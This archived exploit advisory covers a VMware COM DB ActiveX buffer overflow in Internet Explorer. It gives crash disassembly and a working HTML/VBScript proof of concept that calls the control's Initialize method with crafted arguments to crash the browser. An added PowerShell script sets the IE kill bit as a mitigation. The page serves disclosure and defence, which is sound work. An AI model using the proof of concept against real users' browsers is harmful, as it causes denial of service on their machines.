SECURITYVULNS:DOC:21111
Jan 09, 2009 - 12:00 a.m.

VMware COM DB ActiveX Remote Buffer Overflow Exploit

vulners.com

<html>
<!--
<< Bug discovered by cN4phux >> a small GHH from DZ.

VMware COM DB ActiveX Remote Buffer Overflow Exploit

This was written for educational purposes. Use it at your own risk.

The author will not be responsible for any damage.

Tested on Windows XP Professional SP2, with Internet Explorer 6.x.x

CLSID = '8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA'
progID = "VMDBCOMLib.VMList"
member_name = "Initialize"
Target_File = "C:\Program Files\VMware\VMware Server\vmdbCOM.dll"

Vulnerable function (triggers a DoS of IE): Initialize()

Block Disassembly:

111AE667 RETN
111AE668 MOV EAX,[EBP+C]
111AE66B PUSH EBX
111AE66C PUSH EDI
111AE66D PUSH EAX
111AE66E MOV [ESI+4],EAX
111AE671 CALL [EAX]   <-------------------- it will crash here . . .
111AE673 MOV EBX,[EBP+8]
111AE676 PUSH 1133D9D0
111AE67B PUSH EBX
111AE67C CALL 111AF800
111AE681 MOV EDI,EAX
111AE683 ADD ESP,C
111AE686 TEST EDI,EDI
111AE688 JL 111AE731

Exception Code: ACCESS_VIOLATION
Disasm: 111AE671 CALL [EAX] (vmapplib.DLL)

Greetz to friends: Blub, Zigma, Heurs, djug, etc . . .

-->

<object classid='clsid:8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA'
id='VMware_function'></object>
<input language=VBScript onclick=Buffer_Act() type=button value='Click here to start the crash DOS'>
<script language='vbscript'>
Sub Buffer_Act
' First argument: -2147483647 (0x80000001); see the disassembly above for where the crash occurs
buff_1 = -2147483647
buff_2 = 1
' buff_3 is assigned in the original but never passed to Initialize
buff_3 = unescape("%90")
' Call the vulnerable method on the instantiated control with the crafted arguments
VMware_function.Initialize buff_1, buff_2
End Sub
</script>
</html>
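The defensive counterpart to this PoC, as an added example that is not part of the original advisory: the standard mitigation for an Internet Explorer ActiveX control that cannot be removed or patched is the per-CLSID kill bit in the ActiveX Compatibility registry key. This PowerShell script checks and, if missing, sets it for the CLSID quoted above, in both the native and the Wow6432Node view; the function names are my own and it must run as Administrator.

```powershell
# Added example (not part of the original advisory): check and set the IE
# "kill bit" for the VMDBCOMLib.VMList control so IE refuses to instantiate it.
$Clsid   = '{8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA}'   # CLSID from the advisory
$KillBit = 0x400                                       # FLAG_KILL_BIT in Compatibility Flags
$Paths = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
    # 32-bit IE on 64-bit Windows reads the WOW6432Node view of the key
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
)

# Returns $true only if the kill bit is already present in Compatibility Flags
function Test-KillBit {
    param([string]$Path)
    if (-not (Test-Path $Path)) { return $false }
    $flags = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return $false }
    return (($flags -band $KillBit) -eq $KillBit)
}

# ORs the kill bit into the existing flags so other compatibility bits are preserved
function Set-KillBit {
    param([string]$Path)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    $existing = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $existing) { $existing = 0 }
    Set-ItemProperty -Path $Path -Name 'Compatibility Flags' -Type DWord -Value ($existing -bor $KillBit)
}

foreach ($p in $Paths) {
    if (Test-KillBit $p) {
        Write-Host "Kill bit already set: $p"
    } else {
        Set-KillBit $p
        Write-Host ("Kill bit set: $p (verified: " + (Test-KillBit $p) + ")")
    }
}
```

After the change, the object tag in the PoC above instantiates nothing in IE, and the Initialize call fails instead of reaching the CALL [EAX] shown in the disassembly.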